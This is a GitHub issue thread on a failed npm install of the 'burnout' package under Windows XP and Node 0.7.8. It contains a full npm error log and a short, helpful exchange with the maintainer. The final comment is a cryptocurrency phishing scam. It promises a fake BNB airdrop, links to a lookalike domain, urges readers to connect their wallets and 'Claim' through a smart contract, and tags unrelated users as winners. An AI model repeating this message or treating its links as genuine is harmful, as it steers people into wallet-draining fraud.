### ISSUE TITLE
Can't install on Windows XP

### ISSUE THREAD

**Issue by dshimkoski** [cdata/burnout#1]
node -v
v0.7.8

npm -v
1.1.18

```
info it worked if it ends with ok
verbose cli [ 'C:\\scripts\\\\node.exe',
verbose cli   'C:\\scripts\\npm\\node_modules\\npm\\bin\\npm-cli.js',
verbose cli   'install',
verbose cli   'burnout' ]
info using npm@1.1.18
info using node@v0.7.8
verbose C:\scripts\\node.exe node symlink
verbose config file C:\Documents and Settings\nbkw72p\.npmrc
verbose config file C:\scripts\etc\npmrc
verbose config file C:\scripts\npm\node_modules\npm\npmrc
verbose caching C:\js\node_modules\chai\package.json
verbose caching C:\js\node_modules\node.io\package.json
verbose caching C:\js\node_modules\wd\package.json
verbose cache add [ 'burnout', null ]
silly cache add: name, spec, args [ undefined, 'burnout', [ 'burnout', null ] ]
verbose parsed url { pathname: 'burnout', path: 'burnout', href: 'burnout' }
verbose addNamed [ 'burnout', '' ]
verbose addNamed [ null, '' ]
silly name, range, hasData [ 'burnout', '', false ]
verbose raw, before any munging burnout
verbose url resolving [ 'https://registry.npmjs.org/', './burnout' ]
verbose url resolved https://registry.npmjs.org/burnout
http GET https://registry.npmjs.org/burnout
http 200 https://registry.npmjs.org/burnout
silly get cb [ 200,
silly get cb   { vary: 'Accept',
silly get cb     server: 'CouchDB/1.2.0 (Erlang OTP/R15B)',
silly get cb     etag: '"89PJMUNHWACE7WEKIYNF7CZ15"',
silly get cb     date: 'Thu, 26 Jul 2012 00:53:19 GMT',
silly get cb     'content-type': 'application/json',
silly get cb     'content-length': '6605' } ]
silly name, range, hasData 2 [ 'burnout', '', true ]
silly versions [ 'burnout', [] ]
ERR! Error: No compatible version found: burnout
ERR! No valid targets found.
ERR! Perhaps not compatible with your version of node?
ERR!     at installTargetsError (C:\scripts\npm\node_modules\npm\lib\cache.js:486:10)
ERR!     at next_ (C:\scripts\npm\node_modules\npm\lib\cache.js:436:17)
ERR!     at next (C:\scripts\npm\node_modules\npm\lib\cache.js:413:44)
ERR!     at C:\scripts\npm\node_modules\npm\lib\cache.js:406:5
ERR!     at saved (C:\scripts\npm\node_modules\npm\lib\utils\npm-registry-client\get.js:151:7)
ERR!     at Object.oncomplete (C:\scripts\npm\node_modules\npm\node_modules\graceful-fs\graceful-fs.js:230:7)
ERR! You may report this log at:
ERR!     <http://github.com/isaacs/npm/issues>
ERR! or email it to:
ERR!     <npm-@googlegroups.com>
ERR! 
ERR! System Windows_NT 5.1.2600
ERR! command "C:\\scripts\\\\node.exe" "C:\\scripts\\npm\\node_modules\\npm\\bin\\npm-cli.js" "install" "burnout"
ERR! cwd C:\js
ERR! node -v v0.7.8
ERR! npm -v 1.1.18
ERR! message No compatible version found: burnout
ERR! message No valid targets found.
ERR! message Perhaps not compatible with your version of node?
verbose exit [ 1, true ]
```

**Comment by dshimkoski** [comment]
I should also add that I can't upgrade node because 0.8.x freezes randomly on XP.

And I can't upgrade XP.

And, yes, I am sad about this. :)

**Comment by cdata** [comment]
That sounds lame :/ haven't tested Node on Windows at all, to be honest. I'll poke around and see if I can find a happy middle ground. There is currently no technical reason why Burnout should require Node > 0.6.x.

Do keep in mind that odd-numbered Node versions are unstable though, so I wouldn't recommend 0.7 for any production use cases.

**Comment by dshimkoski** [comment]
My main use case at the moment is browser automation for dev productivity tools, so stability isn't a huge concern.

If we decide to use this for acceptance testing as well, the platform will support more recent versions of node.

In any case, I appreciate you taking a look at this!

**Comment by mrpanday93** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @zbhuang, @pipixiahuitiaowu, @suntus, @baonq-me, @kannishk, @NERIVALDOLIMA, @t-hiroyoshi
